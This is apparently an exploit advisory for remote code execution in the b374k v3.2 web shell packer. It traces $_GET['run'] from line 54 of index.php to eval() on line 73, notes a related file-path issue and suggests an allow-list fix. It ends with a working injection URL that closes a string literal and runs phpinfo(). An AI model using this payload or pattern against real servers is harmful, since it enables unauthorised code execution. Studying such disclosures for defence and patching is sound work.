[-] Exploit title : b374k v3.2 shell script remote code execution
[-] Software dl : https://github.com/b374k/b374k
[-] Date : 12-1-2018
[-] Category : Webapps
[-] Author : The_Ripper
[-] Tested on : Win XP
[-] Dork : N/A
[-] Author telegram : @The_Ripper
======================================
[-] Vulnerable page Address:
b374k-master/index.php
======================================
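[-] Vulnerable Source code (taint trace, listed from the eval() sink back to the $_GET['run'] source; the leading numbers are line numbers in index.php) :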
73 >> eval eval($content); 
72 >> $content = trim($module_init) . "?>" . $base_code . $module_code . $layout; 
58 >> $module_init = "\n\$GLOBALS['module_to_load'] = array(" . implode(", ", $module_arr) . ");"; 
57 >> $module_arr = array_map("packer_wrap_with_quote", $module_arr); 
55 >> $module_arr = array_merge(array("explorer", "terminal", "eval"), $modules); 
54 >> $modules = explode(",", $_GET['run']); 
22 >> $base_code .= packer_read_file($GLOBALS['packer']['base_dir'] . "main.php"); 
21 >> $base_code .= packer_read_file($GLOBALS['packer']['base_dir'] . "resources.php"); 
20 >> $base_code = ""; 
63 >> $module_code .= packer_read_file($filename . ".php"); 
23 >> $module_code = packer_read_file($GLOBALS['packer']['base_dir'] . "base.php"); 
62 >> $filename = $GLOBALS['packer']['module_dir'] . $module; 
61 >> $module = trim($module); 
60 >> foreach($modules as $module)
54 >> $modules = explode(",", $_GET['run']); 
70 >>  $layout = str_replace("<__JS__>", $js_code, $layout); 
64 >> $js_code .= "\n" . packer_read_file($filename . ".js") . "\n"; 
31 >> $js_code .= "\n\n" . packer_read_file($GLOBALS['packer']['base_dir'] . "base.js"); 
30 >> $js_code = "\n\n" . packer_read_file($GLOBALS['packer']['base_dir'] . "sortable.js") . $js_main_code; 
28 >> $js_main_code = "\n\n" . packer_read_file($GLOBALS['packer']['base_dir'] . "main.js"); 
62 >> $filename = $GLOBALS['packer']['module_dir'] . $module; 
61 >> $module = trim($module); 
60 >> foreach($modules as $module)
54 >> $modules = explode(",", $_GET['run']); 
69 >> $layout = str_replace("<__ZEPTO__>", $zepto_code, $layout); 
27 >> $zepto_code = packer_read_file($GLOBALS['packer']['base_dir'] . "zepto.js"); 
68 >> $layout = str_replace("<__CSS__>", $css_code, $layout); 
36 >> $css_code = packer_read_file($GLOBALS['packer']['theme_dir'] . $theme . ".css"); 
35 >> $theme = "default"; 
41 >> $layout = packer_read_file($GLOBALS['packer']['base_dir'] . "layout.php"); 
requires (conditions enclosing the traced code):
44 >> if(isset($_SERVER['REMOTE_ADDR']))
52 >> elseif(isset($_GET['run']))
======================================
[-] Description :
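To execute code you only need to supply a crafted value for
$_GET['run']. The value is split on commas (line 54), each item is passed through packer_wrap_with_quote() (line 57) and joined into $module_init (line 58), which becomes part of the $content string given to eval() on line 73. The body of packer_wrap_with_quote() is not shown here; the example below relies on it not escaping quote characters, so the value can close the string literal and the remainder is evaluated as PHP. The same unvalidated $module is also appended to the module directory path that packer_read_file() reads (lines 62-64). Fix: accept only module names from a fixed allow-list before they are used in generated code or in a file path. For example :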
/index.php?run=';phpinfo();//